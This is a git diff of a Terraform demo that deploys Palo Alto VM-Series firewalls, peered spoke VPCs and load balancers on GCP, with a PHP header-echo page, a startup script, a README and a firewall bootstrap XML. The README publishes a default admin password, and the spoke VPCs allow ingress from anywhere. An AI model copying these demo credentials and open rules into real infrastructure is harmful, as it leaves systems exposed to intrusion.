+output "subnetwork_id" {
+  value = "${google_compute_subnetwork.default.*.id}"
+}
+
+output "subnetwork_name" {
+  value = "${google_compute_subnetwork.default.*.name}"
+}
+
+output "subnetwork_self_link" {
+  value = "${google_compute_subnetwork.default.*.self_link}"
+}
+
+output "vpc_name" {
+  value = "${google_compute_network.default.*.name}"
+}
+
+output "vpc_id" {
+  value = "${google_compute_network.default.*.id[0]}"
+}
+
+output "vpc_self_link" {
+  value = "${google_compute_network.default.*.self_link[0]}"
+}
diff --git a/gcp/adv-peering-with-lbnh/outputs.tf b/gcp/adv-peering-with-lbnh/outputs.tf
new file mode 100644
index 00000000..28bd734c
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/outputs.tf
@@ -0,0 +1,52 @@
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+output "                             IMPORTANT!! PLEASE READ!!                                    " {
+  value = [
+      "===================================================================================",
+      "Before proceeding, you must enable import/export custom routes on all peering links",
+      "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs",
+      "There is also a need to create a default route in the ilb-trust-subnet pointing to",
+      "the internal load balancer",
+      "==================================================================================="]
+}
+output "GLB-ADDRESS   " {
+  value = "http://${module.vmseries_public_lb.address}"
+}
+
+output "MGMT-URL-FW1  " {
+  value = "https://${module.vm_fw.fw_nic1_public_ip[0]}"
+}
+
+output "MGMT-URL-FW2  " {
+  value = "https://${module.vm_fw.fw_nic1_public_ip[1]}"
+}
+output "MGMT-URL-ILB-FW3 " {
+  value = "https://${module.vm_fw_ilbnh.fw_nic1_public_ip[0]}"
+}
+
+output "MGMT-URL-ILB-FW4  " {
+  value = "https://${module.vm_fw_ilbnh.fw_nic1_public_ip[1]}"
+}
+output "SSH-SPOKE1-VM1-FW1" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE1-VM2-FW1" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE2-FW1" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 223 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE1-VM1-FW2" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i <INSERT KEY>"
+}
+output "SSH-SPOKE1-VM2-FW2" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i <INSERT KEY>"
+}
+
+output "SSH-SPOKE2-FW2" {
+  value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 223 -i <INSERT KEY>"
+}
diff --git a/gcp/adv-peering-with-lbnh/scripts/showheaders.php b/gcp/adv-peering-with-lbnh/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh b/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh
new file mode 100644
index 00000000..3576db4e
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
diff --git a/gcp/adv-peering-with-lbnh/spoke1.tf b/gcp/adv-peering-with-lbnh/spoke1.tf
new file mode 100644
index 00000000..7cae884c
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/spoke1.tf
@@ -0,0 +1,79 @@
+provider "google" {
+  credentials = "${var.spoke1_project_authfile}"
+  project     = "${var.spoke1_project}"
+  region      = "${var.region}"
+  alias       = "spoke1"
+}
+
+#************************************************************************************
+# CREATE SPOKE1 VPC & SPOKE1 VMs (w/ INTLB)
+#************************************************************************************
+module "vpc_spoke1" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "spoke1-vpc"
+  subnetworks       = ["spoke1-subnet"]
+  ip_cidrs          = ["10.10.1.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+
+  providers = {
+    google = "google.spoke1"
+  }
+}
+
+module "vm_spoke1" {
+  source          = "./modules/create_vm/"
+  vm_names        = ["spoke1-vm1", "spoke1-vm2"]
+  vm_zones        = ["${var.region}-a", "${var.region}-a"]
+  vm_machine_type = "f1-micro"
+  vm_image        = "ubuntu-os-cloud/ubuntu-1604-lts"
+  vm_subnetworks  = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"]
+  vm_ssh_key      = "ubuntu:${var.ubuntu_ssh_key}"
+  startup_script  = "${file("${path.module}/scripts/webserver-startup.sh")}"                                         // default "" - runs no startup script
+
+  internal_lb_create = true           // default false
+  internal_lb_name   = "spoke1-intlb" // default "intlb"
+  internal_lb_ports  = ["80", "443"]  // default ["80"]
+  internal_lb_ip     = "10.10.1.100"  // default "" (assigns an any available IP in subnetwork )
+
+  providers = {
+    google = "google.spoke1"
+  }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE1-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke1_to_trust" {
+  name         = "spoke1-to-trust"
+  network      = "${module.vpc_spoke1.vpc_self_link}"
+  peer_network = "${module.vpc_trust.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.ilb_trust_to_spoke2",
+  ]
+  provider = "google.spoke1"
+}
+#************************************************************************************
+# CREATE PEERING LINK SPOKE1-to-ilb-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke1_to_ilb_trust" {
+  name         = "spoke1-to-ilb-trust"
+  network      = "${module.vpc_spoke1.vpc_self_link}"
+  peer_network = "${module.ilb_trust.vpc_self_link}"
+  
+  
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.spoke1_to_trust",
+  ]
+  provider = "google.spoke1"
+}
\ No newline at end of file
diff --git a/gcp/adv-peering-with-lbnh/spoke2.tf b/gcp/adv-peering-with-lbnh/spoke2.tf
new file mode 100644
index 00000000..591bdb24
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/spoke2.tf
@@ -0,0 +1,72 @@
+provider "google" {
+  credentials = "${var.spoke2_project_authfile}"
+  project     = "${var.spoke2_project}"
+  region      = "${var.region}"
+  alias       = "spoke2"
+}
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE2 VM
+#************************************************************************************
+module "vpc_spoke2" {
+  source            = "./modules/create_vpc/"
+  vpc_name          = "spoke2-vpc"
+  subnetworks       = ["spoke2-subnet"]
+  ip_cidrs          = ["10.10.2.0/24"]
+  regions           = ["${var.region}"]
+  ingress_allow_all = true
+  ingress_sources   = ["0.0.0.0/0"]
+
+  providers = {
+    google = "google.spoke2"
+  }
+}
+
+module "vm_spoke2" {
+  source          = "./modules/create_vm/"
+  vm_names        = ["spoke2-vm1"]
+  vm_zones        = ["${var.region}-a"]
+  vm_machine_type = "f1-micro"
+  vm_image        = "ubuntu-os-cloud/ubuntu-1604-lts"
+  vm_subnetworks  = ["${module.vpc_spoke2.subnetwork_self_link[0]}"]
+  vm_ssh_key      = "ubuntu:${var.ubuntu_ssh_key}"
+
+  providers = {
+    google = "google.spoke2"
+  }
+}
+
+#************************************************************************************
+# CREATE PEERING LINK SPOKE2-to-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke2_to_trust" {
+  name         = "spoke2-to-trust"
+  network      = "${module.vpc_spoke2.vpc_self_link}"
+  peer_network = "${module.vpc_trust.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.spoke1_to_ilb_trust",
+  ]
+  provider = "google.spoke2"
+}
+#************************************************************************************
+# CREATE PEERING LINK SPOKE2-to-ilb-TRUST
+#************************************************************************************
+resource "google_compute_network_peering" "spoke2_to_ilb_trust" {
+  name         = "spoke2-to-ilb-trust"
+  network      = "${module.vpc_spoke2.vpc_self_link}"
+  peer_network = "${module.ilb_trust.vpc_self_link}"
+
+  provisioner "local-exec" {
+    command = "sleep 45"
+  }
+
+  depends_on = [
+    "google_compute_network_peering.spoke2_to_trust",
+  ]
+  provider = "google.spoke2"
+}
diff --git a/gcp/adv-peering-with-lbnh/variables.tf b/gcp/adv-peering-with-lbnh/variables.tf
new file mode 100644
index 00000000..0b4fda73
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/variables.tf
@@ -0,0 +1,70 @@
+#************************************************************************************
+# GCP VARIABLES
+#************************************************************************************
+variable enable_ilbnh {
+  default = true
+}
+
+variable "region" {
+  default = "us-central1"
+}
+
+#************************************************************************************
+# main.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "main_project" {
+  description = "Existing project ID for main project (all resources deployed in main.tf)"
+  default     = "ilb-2019"
+}
+
+variable "main_project_authfile" {
+  description = "Authentication file for main project (all resources deployed in main.tf)"
+  default     = "/Users/dspears/GCP/ilb-2019-key.json"
+}
+
+#************************************************************************************
+# spoke1.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke1_project" {
+  description = "Existing project for spoke1 (can be the same as main project and can be same as main project)."
+  default     = "ilb-2019"
+}
+
+variable "spoke1_project_authfile" {
+  description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)"
+  default     = "/Users/dspears/GCP/ilb-2019-key.json"
+}
+
+#************************************************************************************
+# spoke2.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke2_project" {
+  description = "Existing project for spoke2 (can be the same as main project and can be same as main project)."
+  default     = "ilb-2019"
+}
+
+variable "spoke2_project_authfile" {
+  description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)"
+  default     = "/Users/dspears/GCP/ilb-2019-key.json"
+}
+
+#************************************************************************************
+# VMSERIES SSH KEY & IMAGE (not required if bootstrapping)
+#************************************************************************************
+variable "vmseries_ssh_key" {
+  default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAXsXFhJABLkPEsF2NC/oLJ5sj/cZDXso+qPy30nllU5w== davespears@gmail.com"
+}
+
+#************************************************************************************
+# UBUNTU SSH KEY
+#************************************************************************************
+variable "ubuntu_ssh_key" {
+  default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAXsXFhJABLkPEsF2NC/oLJ5sj/cZDXso+qPy30nllU5w== davespears@gmail.com"
+ }
+
+variable "vmseries_image" {
+  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814"
+  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
+
+  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/README.md b/gcp/adv_peering_2fw_2spoke/README.md
new file mode 100644
index 00000000..40a0f00a
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/README.md
@@ -0,0 +1,72 @@
+## 2 x VM-Series / 2 x Spoke VPCs via Advanced Peering
+Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic for 2 spoke VPCs.  The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. After the build completes, several manual changes must be performed to enable transitive routing.  The manual changes are required since they cannot be performed through Terraform, yet.
+
+### Overview
+* 5 x VPCs (mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections
+* 2 x VM-Series (BYOL / Bundle1 / Bundle2)
+* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation)
+* 1 x Ubuntu VM in spoke2 VPC
+* 1 x GCP Public Load Balancer (VM-Series as backend)
+* 1 x GCP Internal Load Balancer (spoke1 VM's as backend)
+* 1 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/images/diagram.png" width="250">
+</p>
+
+
+### Prerequistes 
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+     * **Username:** paloalto
+     * **Password:** Pal0Alt0@123
+
+### Deployment
+1.  Download the **adv_peering_2fw_2spoke** repo to the machine running the build
+2.  In an editor, open **variables.tf** and set values for the following variables
+
+| Variable        | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `main_project_auth_file` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_auth_file`| Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_auth_file` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3.  Download project authenication key files to the main directory of the terraform build.
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/images/directory.png" width="250">
+</p>
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes** 
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/images/peering.png" width="350">
+</p>
+
+6. Remove default GCP VPC route for spoke1-vpc, spoke2-vpc, & trust-vpc
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/images/routes.png" width="350">
+</p>
+
+7. From Terraform output, go to `GLB-ADDRESS = http://<glb_eip>` in a web browser.  NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP.
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/images/web.png" width="350">
+</p>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
similarity index 84%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml
rename to gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
index 5f91248d..cceeb051 100644
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
@@ -136,32 +136,7 @@
                 <lldp>
                   <enable>no</enable>
                 </lldp>
-                <interface-management-profile>Allow-HTTPS</interface-management-profile>
-              </layer3>
-            </entry>
-            <entry name="ethernet1/3">
-              <layer3>
-                <ipv6>
-                  <neighbor-discovery>
-                    <router-advertisement>
-                      <enable>no</enable>
-                    </router-advertisement>
-                  </neighbor-discovery>
-                </ipv6>
-                <ndp-proxy>
-                  <enabled>no</enabled>
-                </ndp-proxy>
-                <adjust-tcp-mss>
-                  <enable>yes</enable>
-                </adjust-tcp-mss>
-                <dhcp-client>
-                  <create-default-route>no</create-default-route>
-                </dhcp-client>
-                <mtu>1460</mtu>
-                <lldp>
-                  <enable>no</enable>
-                </lldp>
-                <interface-management-profile>Allow-HTTPS</interface-management-profile>
+                <interface-management-profile>mgmt-profile</interface-management-profile>
               </layer3>
             </entry>
           </ethernet>
@@ -175,12 +150,10 @@
             </entry>
           </monitor-profile>
           <interface-management-profile>
-            <entry name="Allow-HTTPS">
-              <permitted-ip>
-                <entry name="10.5.3.5"/>
-                <entry name="10.5.2.5"/>
-              </permitted-ip>
+            <entry name="mgmt-profile">
               <https>yes</https>
+              <http>yes</http>
+              <ping>yes</ping>
             </entry>
           </interface-management-profile>
         </profiles>
@@ -341,11 +314,19 @@
                   </graceful-restart>
                 </routing-options>
               </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
             </protocol>
             <interface>
               <member>ethernet1/1</member>
               <member>ethernet1/2</member>
-              <member>ethernet1/3</member>
             </interface>
             <ecmp>
               <algorithm>
@@ -357,7 +338,7 @@
                 <static-route>
                   <entry name="outbound">
                     <nexthop>
-                      <ip-address>10.5.1.1</ip-address>
+                      <ip-address>192.168.1.1</ip-address>
                     </nexthop>
                     <bfd>
                       <profile>None</profile>
@@ -370,41 +351,44 @@
                     <interface>ethernet1/1</interface>
                     <metric>10</metric>
                     <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
                   </entry>
-                  <entry name="to-web">
-                    <nexthop>
-                      <ip-address>10.5.2.1</ip-address>
-                    </nexthop>
-                    <bfd>
-                      <profile>None</profile>
-                    </bfd>
+                  <entry name="svc1">
                     <path-monitor>
                       <enable>no</enable>
                       <failure-condition>any</failure-condition>
                       <hold-time>2</hold-time>
                     </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
                     <interface>ethernet1/2</interface>
                     <metric>10</metric>
-                    <destination>10.5.2.0/24</destination>
+                    <destination>10.10.1.0/24</destination>
                     <route-table>
                       <unicast/>
                     </route-table>
                   </entry>
-                  <entry name="to-db">
+                  <entry name="svc2">
                     <path-monitor>
                       <enable>no</enable>
                       <failure-condition>any</failure-condition>
                       <hold-time>2</hold-time>
                     </path-monitor>
                     <nexthop>
-                      <ip-address>10.5.3.1</ip-address>
+                      <ip-address>192.168.2.1</ip-address>
                     </nexthop>
                     <bfd>
                       <profile>None</profile>
                     </bfd>
-                    <interface>ethernet1/3</interface>
+                    <interface>ethernet1/2</interface>
                     <metric>10</metric>
-                    <destination>10.5.3.0/24</destination>
+                    <destination>10.10.2.0/24</destination>
                     <route-table>
                       <unicast/>
                     </route-table>
@@ -421,11 +405,20 @@
           <update-schedule>
             <threats>
               <recurring>
-                <every-30-mins>
+                <hourly>
                   <action>download-and-install</action>
-                </every-30-mins>
+                  <at>15</at>
+                </hourly>
               </recurring>
             </threats>
+            <anti-virus>
+              <recurring>
+                <hourly>
+                  <action>download-and-install</action>
+                  <at>30</at>
+                </hourly>
+              </recurring>
+            </anti-virus>
           </update-schedule>
           <timezone>US/Pacific</timezone>
           <service>
@@ -443,7 +436,7 @@
             <dhcp-client>
               <send-hostname>yes</send-hostname>
               <send-client-id>no</send-client-id>
-              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
               <accept-dhcp-domain>no</accept-dhcp-domain>
             </dhcp-client>
           </type>
@@ -461,18 +454,17 @@ DO NOT USE FOR PRODUCTION </login-banner>
           <management>
             <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
             <initcfg>
-              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1</public-key>
               <type>
                 <dhcp-client>
                   <send-hostname>yes</send-hostname>
                   <send-client-id>no</send-client-id>
-                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
                   <accept-dhcp-domain>no</accept-dhcp-domain>
                 </dhcp-client>
               </type>
-              <hostname>vm-series</hostname>
               <dns-primary>8.8.8.8</dns-primary>
               <dns-secondary>4.2.2.2</dns-secondary>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
             </initcfg>
           </management>
         </setting>
@@ -489,20 +481,13 @@ DO NOT USE FOR PRODUCTION </login-banner>
                 </layer3>
               </network>
             </entry>
-            <entry name="web-zone">
+            <entry name="trust-zone">
               <network>
                 <layer3>
                   <member>ethernet1/2</member>
                 </layer3>
               </network>
             </entry>
-            <entry name="db-zone">
-              <network>
-                <layer3>
-                  <member>ethernet1/3</member>
-                </layer3>
-              </network>
-            </entry>
           </zone>
           <service>
             <entry name="service-tcp-22">
@@ -555,7 +540,7 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>ping</member>
                   </application>
                   <service>
-                    <member>application-default</member>
+                    <member>any</member>
                   </service>
                   <hip-profiles>
                     <member>any</member>
@@ -564,9 +549,9 @@ DO NOT USE FOR PRODUCTION </login-banner>
                   <log-end>yes</log-end>
                   <action>allow</action>
                 </entry>
-                <entry name="inbound web-browsing">
+                <entry name="inbound-web">
                   <to>
-                    <member>web-zone</member>
+                    <member>trust-zone</member>
                   </to>
                   <from>
                     <member>untrust-zone</member>
@@ -588,6 +573,7 @@ DO NOT USE FOR PRODUCTION </login-banner>
                   </application>
                   <service>
                     <member>service-http</member>
+                    <member>service-https</member>
                   </service>
                   <hip-profiles>
                     <member>any</member>
@@ -595,13 +581,10 @@ DO NOT USE FOR PRODUCTION </login-banner>
                   <log-start>yes</log-start>
                   <log-end>yes</log-end>
                   <action>allow</action>
-                  <description>Required to access web-server over the VM-Series untrust interface's elastic/public IP address.
-</description>
                 </entry>
-                <entry name="inbound ssh">
+                <entry name="inbound-ssh">
                   <to>
-                    <member>db-zone</member>
-                    <member>web-zone</member>
+                    <member>trust-zone</member>
                   </to>
                   <from>
                     <member>untrust-zone</member>
@@ -619,12 +602,10 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>any</member>
                   </category>
                   <application>
-                    <member>ping</member>
                     <member>ssh</member>
                   </application>
                   <service>
-                    <member>service-tcp-221</member>
-                    <member>service-tcp-222</member>
+                    <member>any</member>
                   </service>
                   <hip-profiles>
                     <member>any</member>
@@ -635,13 +616,12 @@ DO NOT USE FOR PRODUCTION </login-banner>
                   <disabled>no</disabled>
                   <description>If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.</description>
                 </entry>
-                <entry name="outbound all">
+                <entry name="east-west">
                   <to>
-                    <member>untrust-zone</member>
+                    <member>trust-zone</member>
                   </to>
                   <from>
-                    <member>db-zone</member>
-                    <member>web-zone</member>
+                    <member>trust-zone</member>
                   </from>
                   <source>
                     <member>any</member>
@@ -659,7 +639,7 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>any</member>
                   </application>
                   <service>
-                    <member>application-default</member>
+                    <member>any</member>
                   </service>
                   <hip-profiles>
                     <member>any</member>
@@ -667,20 +647,19 @@ DO NOT USE FOR PRODUCTION </login-banner>
                   <log-start>yes</log-start>
                   <log-end>yes</log-end>
                   <action>allow</action>
-                  <description>This rule is required so the web-server and db-server can bootstrap with Apache and mysql for the demo.</description>
                 </entry>
-                <entry name="WEB TO DB">
+                <entry name="outbound">
                   <to>
-                    <member>db-zone</member>
+                    <member>untrust-zone</member>
                   </to>
                   <from>
-                    <member>web-zone</member>
+                    <member>trust-zone</member>
                   </from>
                   <source>
-                    <member>web-server</member>
+                    <member>any</member>
                   </source>
                   <destination>
-                    <member>db-server</member>
+                    <member>any</member>
                   </destination>
                   <source-user>
                     <member>any</member>
@@ -689,7 +668,7 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>any</member>
                   </category>
                   <application>
-                    <member>mysql</member>
+                    <member>any</member>
                   </application>
                   <service>
                     <member>application-default</member>
@@ -700,23 +679,12 @@ DO NOT USE FOR PRODUCTION </login-banner>
                   <log-start>yes</log-start>
                   <log-end>yes</log-end>
                   <action>allow</action>
-                  <profile-setting>
-                    <profiles>
-                      <vulnerability>
-                        <member>Test Drive</member>
-                      </vulnerability>
-                    </profiles>
-                  </profile-setting>
                 </entry>
               </rules>
             </security>
             <nat>
               <rules>
-                <entry name="Web SSH">
-                  <destination-translation>
-                    <translated-address>web-server</translated-address>
-                    <translated-port>22</translated-port>
-                  </destination-translation>
+                <entry name="inbound-80">
                   <source-translation>
                     <dynamic-ip-and-port>
                       <interface-address>
@@ -734,20 +702,22 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>any</member>
                   </source>
                   <destination>
-                    <member>10.5.1.4</member>
+                    <member>any</member>
                   </destination>
-                  <service>service-tcp-221</service>
+                  <service>service-http</service>
                   <nat-type>ipv4</nat-type>
+                  <disabled>no</disabled>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-intlb</translated-address>
+                    <translated-port>80</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
                 </entry>
-                <entry name="DB SSH">
-                  <destination-translation>
-                    <translated-address>db-server</translated-address>
-                    <translated-port>22</translated-port>
-                  </destination-translation>
+                <entry name="inbound-221">
                   <source-translation>
                     <dynamic-ip-and-port>
                       <interface-address>
-                        <interface>ethernet1/3</interface>
+                        <interface>ethernet1/2</interface>
                       </interface-address>
                     </dynamic-ip-and-port>
                   </source-translation>
@@ -761,17 +731,17 @@ DO NOT USE FOR PRODUCTION </login-banner>
                     <member>any</member>
                   </source>
                   <destination>
-                    <member>10.5.1.4</member>
+                    <member>any</member>
                   </destination>
-                  <service>service-tcp-222</service>
+                  <service>service-tcp-221</service>
                   <nat-type>ipv4</nat-type>
-                  <disabled>no</disabled>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
